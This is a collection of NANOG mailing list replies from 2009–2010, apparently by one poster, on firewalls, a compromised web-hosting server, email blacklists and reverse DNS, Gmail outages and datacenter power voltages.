Re: Please do not respond to Dean and CC the NANOG list
On Apr 15, 2010, at 4:26 PM, Jeremy Parr wrote: > On 15 April 2010 16:18, Dean Anderson wrote: >> It won't end until the truth finally prevails and they quit trying to >> mislead people. > > Can someone remove this guy form the Nanog list please? > He is removed but he still harasses everyone. Do what I do, auto respond to his messages telling him to not email you then forward to ab...@. He will get the hint.
Re: Need advise for a linux firewall
On Thu, Mar 11, 2010 at 12:06 PM, gordon b slater wrote: > On Thu, 2010-03-11 at 09:01 -0800, Marty Anstey wrote: > >> +1 for pfsense. I've been running it for over 18 months with no problems >> whatsoever. It does everything I needed it to do, and quite a bit more. > > > actually, reading back on the nanog list for a few plays (playing > catch-up here) pfsense would have made a good contender for the "best > VPN appliance thread :) > > Gord > > -- > ALERT: kitchen-sensor-03 reports over-temp > > > I use PFsense 1.2.3 in my office environment with 4 nics, 2 100 mbit and 2 gigabit. I have different network segments and all are sharing the same internet connection. It works great and has been online since we moved into this new office a month ago. I also use it as a VPN end point for when I need to troubleshoot our network and I am out and about. It is great and can also do other office type filtering/monitoring. It has Squid plugins, IMSPector plugins and it also can do tcpdumps (very useful IMHO) Ronald Cotoni
Re: Security Guideance
Quick suggestion BUT you may want to have Parallels look into it if you can't seem to find it since you pay for the support anyways. You may also want to check to see if it is a cron job that is doing it (if the machine was root kitted, you may have accidentally copied a cron job over. Another suggestion would be simply move half the accounts to one server and half to another and see if it ddoses again and keep doing that until you find the problem account. On Tue, Feb 23, 2010 at 2:46 PM, Paul Stewart wrote: > Hi folks... > > > > We have a strange series of events going on in the past while Brief > history here, looking for input from the community - especially some of > the security folks on here. > > > > We provide web hosting services - one of our hosting boxes was found a > while back with root kits installed, un patched software and lots of > other "goodies". With some staff changes in place (don't think I need > to elaborate on that) we are trying to clean up several issues including > this particular server. A new server was provisioned, patched, and > deployed. User data was moved over and now the same issue is coming > back > > > > The problem is that a user on this box appears to be launching high > traffic DOS attacks from it towards other sites. These are UDP based > floods that move around from time to time - most of these attacks only > last a few minutes. > > > > I've done tcpdumps within seconds of the attack starting and to date > been unable to find the source of this attack (we know the server, just > not sure which customer it is on the server that's been compromised). > Several hours of scanning for php, cgi, pl type files have been wasted > and come up nowhere... > > > > It's been suggested to dump IDS in front of this box and I know I'll get > some feedback positive and negative in that aspect. > > > > What tools/practices do others use to resolve this issue? It's a > Centos 5.4 box running latest Plesk control panel. > > > > Typically we have found it easy to track down the offending script or > program - this time hasn't been easy at all... > > > > Thanks, > > > > Paul > > > > > > > > > > > > > > > "The information transmitted is intended only for the person or entity to > which it is addressed and contains confidential and/or privileged material. > If you received this in error, please contact the sender immediately and then > destroy this transmission, including all attachments, without copying, > distributing or disclosing same. Thank you." >
Re: several messages
On Thu, Feb 18, 2010 at 3:25 PM, Patrick W. Gilmore wrote: > On Feb 18, 2010, at 3:15 PM, Michelle Sullivan wrote: >> Dean Anderson wrote: >>> [Damn. spit out my coffee on keyboard.] >>> >>> Levine and Vixie are partners in Whitehat. Whitehat is a commercial bulk >>> mailer that offers listwashing services (removing spam-traps). MAPS >>> employees were involved in listwashing. MAPS, Spamhaus, SORBS do not >>> block Whitehat, suggesting that the spamtraps removed come from >>> MAPS/Spamhaus/SORBS >>> >> >> LOL Dean's really lost it finally (if he hadn't before.) SORBS does not >> 'not block' anyone (many on here will attest to that) no one is to big >> or too small to get listed in SORBS. >> >> ..but more importantly, and almost on topic unlike Dean's entire >> post... I thought Dean was banned for his off continual off topic posts >> and all the attacks on other people and organisations? > > Dean e-mails lots of people directly and CC's the list with his .. uh .. > missives. The list members do not see it, just the people individual on the > To or CC lines see it. > > When you reply to the list, /then/ people on the list see it. > > I am replying to the list because I want to educate people. The next time > someone gets e-mail from Dean, please do not reply to NANOG. > > -- > TTFN, > patrick > > > +1 to that. I had to create a mail filter specifically for him that takes the message, sends it back with a message saying not to mail me anymore. He doesn't get hints very well.
Re: Google to offer fiber to end users
On Wed, Feb 10, 2010 at 5:03 PM, Steven Bellovin wrote: > > On Feb 10, 2010, at 4:15 PM, Matt Simmons wrote: > >> I'm really interested in their distribution ideas, as well as the >> bottleneck from the Google network to the rest of the internet. >> >> Ah, who am I kidding, it's not like anyone cares about the rest of the >> internet, right? > > The WSJ says: "In an interview, Google product manager Minnie Ingersoll said > consumers > will be able to buy service directly from Google or from other > providers, whom Google will allow to resell the service. She said > Google will manage the deployment of the network but probably partner > with contractors to help build it." > > --Steve Bellovin, http://www.cs.columbia.edu/~smb > > > > > > > I honestly wonder if they will use ipv4 or ipv6 for their rollout... Could be interesting to watch!
Re: Threading the senderbase reputation needle
On Tue, Feb 2, 2010 at 10:32 AM, Drew Weaver wrote: > Since email reputation is now being based on the neighborhood theory you > must do one of the following: > > Do one of the following (hopefully #1): > > 1.) Provide custom reverse DNS for the customer. BCP for SMTP server DNS > is matching forward and reverse DNS. Anything else is suspect... > > 2.) Set up a relay host and funnel all customers mail through it. > > Side effects of each: > > 1.) Slightly more work on the front end (but hey, even AT&T will do this > for business DSL customers). People will know you have clue. The > technical staff at your customers will be happy and recommend you to their > peers (well, I guess this depends a bit on what kind of customers you > have). > > 2.) You have taken responsibility for all your customers' outbound mail > flows. You will need to scale an abuse desk and maintain effective > anti-spam policies (including customer education). If you don't run an > effective abuse desk (including blocking your own customers outbound mail > when necessary), you will be blacklisted eventually anyway. You could > charge extra for or outsource this ESP service. > == > > Okay, as I mentioned, we allow the customers to set their reverse DNS to > whatever they want as long as the forward and the reverse match. we don't own > the customer's domains nor do we host the DNS for 99% of them, so I'm not > sure how we could enforce a rule saying that everyone on our network has to > have their reverse DNS set a certain way. That is why we set it up like we > did, because we can control hostnames within our domain and we can set the > PTR record to match. Like I said before we're a hosting company, we sell > Co-Lo, Dedicated servers, and Virtualization products. > > It seems somewhat impossible to employ either of your suggestions in our > environment. > > thanks, > -Drew > > > > I used to work at a hosting company and we had a few solutions in place. Whenever a client purchased a server or an additional block of ip's, it was assigned the reverse dns related to the hostname of their server. This even included example.com sometimes. The client could then change it as they wish. Another option we had was an outgoing spam filter setup with ASSP. This scrubbed all outgoing mail for spam messages. Honestly the first option was good enough for most people. About 99.95% of your clients assign a forward DNS for their server/colo/virtualization products. Just make it a requirement that they provide that before you turn up their service. This prevents DUHLs from listing you for those generic RDNS names.
Re: SORBS on autopilot?
On Fri, Jan 15, 2010 at 10:17 AM, Michelle Sullivan wrote: > telmn...@757.org wrote: >>> >>> Did SORBS really cause you that much pain? >> >> Yes. We purchased colo space for some systems that didn't need high class >> of service (mostly development systems.) The IP space in a former lifetime >> was a dialup pool for analog modems. >> >> We of course changed the reverse DNS entries, and did the normal request >> with SORBS. Nothign really happened. I started looking into it, and finding >> stories of people doing the mandatory $90 donation to get express attention, > > ...and at this point we know the poster (like a fair few other in this > thread) is either talking c**p or mixing SORBS with some other list. There > is NO donation required for non spam listings (a DUHL entry is not a spam > listing) and $90 is plucked from thin air... a cursory look at the SORBS > website will attest to that. > > > Michelle > > Note: The original poster was noted to have never opened a ticket @ SORBS by > one of the staff.. I haven't verified that personally, but it does follow a > common theme.. People complain about listings and have subsequently been > found to have *not* requested delisting through the correct channel (the > SORBS support system)... I wonder how many would get this sort of response > (a firey NANOG thread) if they complained their ADSL was broken to the > yellowpages sales line...?!?!? > > At the same time, I never hear this about spamhaus or outblaze. Go figure :( Maybe your system is too confusing and you might want to take a survey and revamp it to something a bit more functional.
Re: more news from Google
It was to others :) But in the process of troubleshooting, an admin may come across something say by looking at a bounce message or other statistics such as which domains the user sends to on a regular basis. cPanel even comes with Eximstats which does some of that for you. On Wed, Jan 13, 2010 at 2:56 PM, Joe Abley wrote: > > On 2010-01-13, at 14:51, Ronald Cotoni wrote: > >> You should most likely read their terms of service and that would >> actually answer this instead of guessing. > > I've read the terms of service. I may be interpreting them incorrectly, sure, > but I'm not guessing. > > If your comment was not directed at me, but was a more general recommendation > for all people who might guess rather than read, then sure, I agree. > > > Joe > >
Re: more news from Google
You should most likely read their terms of service and that would actually answer this instead of guessing. Also, if your reading your own employee's email, that is most likely perfectly legal. On Wed, Jan 13, 2010 at 2:22 PM, Joe Abley wrote: > > On 2010-01-13, at 11:31, Anthony Uk wrote: > >> The ability to automatically discern users' political positions from their >> inbox is not one that any email provider reasonably needs. > > It's arguably something that gmail users consent to when they give Google > rights to index and process their mail, though. > > > Joe >
Re: cable provider problems yesterday around 1pm EST?
Were there any problems on the internet at 1 PM EST yesterday :) But honestly which provider and in what area? On Wed, Jan 13, 2010 at 11:23 AM, Steve Meuse wrote: > Rich Casto expunged (richca...@gmail.com): > >> Is anyone aware of any routing problems with any cable providers yesterday >> around 1pm EST? Thanks! > > I dare you to be more vague > > -Steve > > >
Re: Arrogant RBL list maintainers
On Thu, Dec 10, 2009 at 8:20 AM, Tony Finch wrote: > On Thu, 10 Dec 2009, Chris Edwards wrote: >> On Wed, 9 Dec 2009, Michael Holstein wrote: >> >> | Their initial email said : >> | >> | [snip] >> | Trend Micro Notification: 137.148.0.0/16 added to DUL >> | [snip] >> >> Oh dear. I can see why many sites that once used MAPS now don't :-( > > It isn't just idiocy like this thread. They never expire entries from the > RBL, even when IP address space changes hands. The most stupid thing is > that they will not accept bug reports from their customers, insisting that > they come from the sender (not recipient). WTF?! > > Tony. > -- > f.anthony.n.finch http://dotat.at/ > GERMAN BIGHT HUMBER: SOUTHWEST 5 TO 7. MODERATE OR ROUGH. SQUALLY SHOWERS. > MODERATE OR GOOD. > > Very true. At my old place of employment a DUHL listed an ip since before my previous company existed. For some reason, when we obtained it, they still listed it. Sounds like a bug in the DUHL bot to me. Also the standard makes a lot of sense. You may be on Trend Micros DUHL by following the rules on SORBS DUHL and vica versa. Makes life a pain.
Re: Repeated Blacklisting / IP reputation
Joe Greco wrote: there is a fundamental disconnect here. the IP space is neutral. it has no bias toward or against social behaviours. its a tool. the actual/real target here are the people who are using these tools to be antisocial. blacklisting IP space is always reactive and should only beused in emergency and as a -TEMPORARY- expedient. IMHO of course., YMMV. Show me ONE major MTA which allows you to configure an expiration for an ACL entry. The problem with your opinion, and it's a fine opinion, and it's even a good opinion, is that it has very little relationship to the tools which are given to people in order to accomplish blocking. Kind of the question I was contemplating in my other message of minutes ago. If people were given an option to "block this IP for 30 minutes, 24 hours, 30 days, 12 months, 5 years, or forever" - I wonder how many people would just shrug and click "forever." This may lead to the discovery of another fundamental disconnect - or two. Sigh. ... JG A cron job/schedule task with a script that removes said line would most likely do wonderous things for you. I could see a comment before each listing with a time/date that you use some regex fu on to figure out how long it was there and how long it should be there for. Simple! You could also automate it with a web frontend for noobs so they don't have to manually edit configuration files.
Re: Repeated Blacklisting / IP reputation
Tom Pipes wrote: Greetings, We obtained a direct assigned IP block 69.197.64.0/18 from ARIN in 2008. This block has been cursed (for lack of a better word) since we obtained it. It seems like every customer we have added has had repeated issues with being blacklisted by DUL and the cable carriers. (AOL, AT&T, Charter, etc). I understand there is a process to getting removed, but it seems as if these IPs had been used and abused by the previous owner. We have done our best to ensure these blocks conform to RFC standards, including the proper use of reverse DNS pointers. I can resolve the issue very easily by moving these customers over to our other direct assigned 66.254.192.0/19 block. In the last year I have done this numerous times and have had no further issues with them. My question: Is there some way to clear the reputation of these blocks up, or start over to prevent the amount of time we are spending with each customer troubleshooting unnecessary RBL and reputation blacklisting? I have used every opportunity to use the automated removal links from the SMTP rejections, and worked with the RBL operators directly. Most of what I get are cynical responses and promises that it will be fixed. If there is any question, we perform inbound and outbound scanning of all e-mail, even though we know that this appears to be something more relating to the block itself. Does anyone have any suggestions as to how we can clear this issue up? Comments on or off list welcome. Thanks, --- Tom Pipes T6 Broadband/ Essex Telcom Inc tom.pi...@t6mail.com Unfortunately, there is no real good way to get yourself completely delisted. We are experiencing that with a /18 we got from ARIN recently and it is basically the RBL's not updating or perhaps they are not checking the ownership of the ip's as compared to before. On some RBL's, we have IP addresses that have been listed since before the company I work for even existed. Amazing right?
Re: Issues with Gmail
Dominic J. Eidson wrote: It appears to be much more a problem with gmail (the MUA) than gmail (the MDA). Gmail/imap appears to be working fine, at least from AUS. - d. On Tue, 1 Sep 2009, Kameron Gasso wrote: Jim Wininger wrote: Anyone else seeing issues with gmail? Yep, it's been throwing 502 HTTP errors for about 25 minutes now. We've been getting a handful of calls from frantic Gmail users wondering why we broke their interwebs. ;) Works fine from chicago via imap
Re: MTAs used
http://www.google.com/search?q=list+of+the+most+used+MTAs&ie=utf-8&oe=utf-8&aq=t&rls=com.frontmotion:en-US:unofficial&client=firefox-aand http://www.google.com/search?q=MTA+market+share&ie=utf-8&oe=utf-8&aq=t&rls=com.frontmotion:en-US:unofficial&client=firefox-a On Wed, Aug 26, 2009 at 8:50 AM, Sharef Mustafa wrote: > Hi, > > > > Can anyone please point me to a list of the most used MTAs (mail > servers) and their market share? > > > > BR > >
Can someone from earthlink contact me offlist
I need to talk to someone at earthlink who is a mail administrator?
Re: several messages
And I still have yet to get someone from sorbs to contact me off list. I wonder if they actually read email (highly doubtful at this point)
Re: Can someone from SORBS contact me offlist?
Sadly, this is for remote hosts. I have no idea why someone would use such services as there are too many false positives. It is like using an IDS that is 2 weeks behind on it's definition. That brings up the point of false positives and outdated information blocking legitimate users, perhaps many which is what my company is experiencing since they deem certain reverse dns entries too "generic" and blacklisted a /18. I believe that is why no one knows if they will be bought or whatnot. Who knows. On Sat, Jul 11, 2009 at 1:50 PM, John Souvestre wrote: > Hi Brielle. > > Do they take two weeks to put a spammer on the list? > > Regards, > > John > >John Souvestre - New Orleans LA > > > -Original Message- > > From: Brielle Bruns [mailto:br...@2mbit.com] > > Sent: Saturday, July 11, 2009 12:12 PM > > To: nanog@nanog.org > > Subject: Re: Can someone from SORBS contact me offlist? > > > > On 7/11/09 11:05 AM, Ronald Cotoni wrote: > > > Yes, they are really bad. It is actually quite silly that a > blacklisting > > > service is that slow on responding to problems. > > > > I find it unacceptable that people demand instant service from a company > > they don't have prior business arrangements/relationship with. Average > > turn around time for the AHBL is around two weeks if we don't have an > > established contact and procedure with. > > > > How would you like it if a non-customer came to you demanding resolution > > to a problem with a free service you provide? Would you drop > > everything, and give that non-customer the same service you give a > > paying customer? > > > > > > -- > > Brielle Bruns > > The Summit Open Source Development Group > > http://www.sosdg.org/ http://www.ahbl.org > > >
Re: Can someone from SORBS contact me offlist?
Yes, they are really bad. It is actually quite silly that a blacklisting service is that slow on responding to problems. On Sat, Jul 11, 2009 at 11:45 AM, John Peach wrote: > On Sat, 11 Jul 2009 11:34:58 -0500 > James Hess wrote: > > > On Sat, Jul 11, 2009 at 11:08 AM, Christopher > > Morrow wrote: > > > >From www.sorbs.net: > > > "It comes with great sadness that I have to announce the imminent > > [snip] > > > > You might want to read the June 25th update they made to the > > announcement, as shown on the very same page. > > > > SORBS has never had a good reputation over removals.. > > -- > John > >
Can someone from SORBS contact me offlist?
I need to resolve some issues that we are having with you guys but there is a lack of timelyness with your contact forms, 28 days is simply unacceptable :(
Re: Why choose 120 volts?
I have some similar input. At my company, we use both 120 and 208 volt depending on what servers we are putting in the racks. We can fill up every single rack to full capacity 100% of the time by using energy efficient servers. The fact that it is 120 volt or 208 volt hardly matters on most machines except Xeon/Opeteron class systems. We use a lot of Core 2 duo, Atom and Xeon Low Voltage processors. This allows us higher density on the same power and makes 208 volt mostly irrelevant. On Thu, May 28, 2009 at 11:18 AM, William Pitcock wrote: > On Tue, 2009-05-26 at 12:39 -0700, Seth Mattinen wrote: >> I have a pure curiosity question for the NANOG crowd here. If you run >> your facility/datacenter/cage/rack on 120 volts, why? >> > > We are using 120V in our colocation spaces. > >> I've been running my facility at 208 for years because I can get away >> with lower amperage circuits. I'm curious about the reasons for using >> high-amp 120 volt circuits to drive racks of equipment instead of >> low-amp 208 or 240 volt circuits. > > The reason why we are using 120V is because we have pre-existing > equipment (such as PDUs) that only support 120V operation. I believe > our newer PDUs support 120/208/240, but do not have the time to > investigate that, and we still have a couple of older APC units still in > service. Our servers don't really care which voltage we provide, most > of the PSUs can determine 120 vs 240 automatically, even. > > Also, at least at Equinix Chicago, 120V service was cheaper when we > colocated there. I do not know if this is the same case at Steadfast in > Chicago, and as far as I know, HE does not offer 208/240 service in > their Fremont-2 facility. I could be misinformed on that, though. > -- > William Pitcock > SystemInPlace - Simple Hosting Solutions > 1-866-519-6149 > > >
